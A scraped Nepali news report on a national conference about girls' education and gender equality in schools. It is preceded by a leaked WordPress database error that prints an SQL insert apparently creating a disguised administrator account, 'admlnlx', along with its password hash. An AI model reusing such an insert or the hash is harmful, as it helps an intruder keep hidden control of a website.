WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B9lvBZVlDrsQdtIR6u85GiFm.sH6g4.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 10:12:02', '', 'admlnlx', 'admlnlx')
काठमाडौँ, मंसिर २१ –
शिक्षा क्षेत्रमा देखिएको लैङ्गिक विभेद अन्त्य गर्नुपर्नेमा सहभागी एकमत छन् ।
शिक्षामा लैङ्गिक समतामा मन्त्रालयबीच समन्वय गर्नका लागि आयोजना गरिएको दुईदिने ‘छात्रा शिक्षा तथा लैङ्गिक समता’ सम्बन्धी राष्ट्रिय सम्मेलनमा सहभागीले लैङ्गिक विभेद अन्त्य गरी छात्राको शिक्षामा गुणस्तर ल्याउनुपर्नेमा जोड दिए ।
कार्यक्रममा शिक्षा विभागका निर्देशक मित्रमणि गर्तौलाले सम्मेलनमा आपसी समन्वय गरी छात्रामा देखिएको लैङ्गिक विभेद हटाउन सबै मन्त्रालय सहमत भएको बताउनुभयो ।उहाँका अनुसार जिल्लास्थित ‘बालिका शिक्षा तथा लैङ्गिक समविकास सञ्जाल’लाई अझै प्रभावकारी बनाउने निर्णय सम्मेलनले गरेको छ ।
डोटी जिल्ला शिक्षा अधिकारी अनन्तकुमार पौडेलले स्थानीय तहका बासिन्दालाई अगाडि सारेर नै लैङ्गिक विभेद हटाउन सकिने बताउनुभयो ।
सम्मेलनमा शिक्षामा लैङ्गिक समतासम्बन्धी काम गर्ने शिक्षा, स्वास्थ्य, महिला, बालबालिका तथा समाजकल्याण, युवा तथा खेलकुद र सङ्घीय मामिला तथा स्थानीय विकास मन्त्रालयमा लैङ्गिक समतासम्बन्धी काम गर्ने १६० कर्मचारीको सहभागिता थियो । – रासस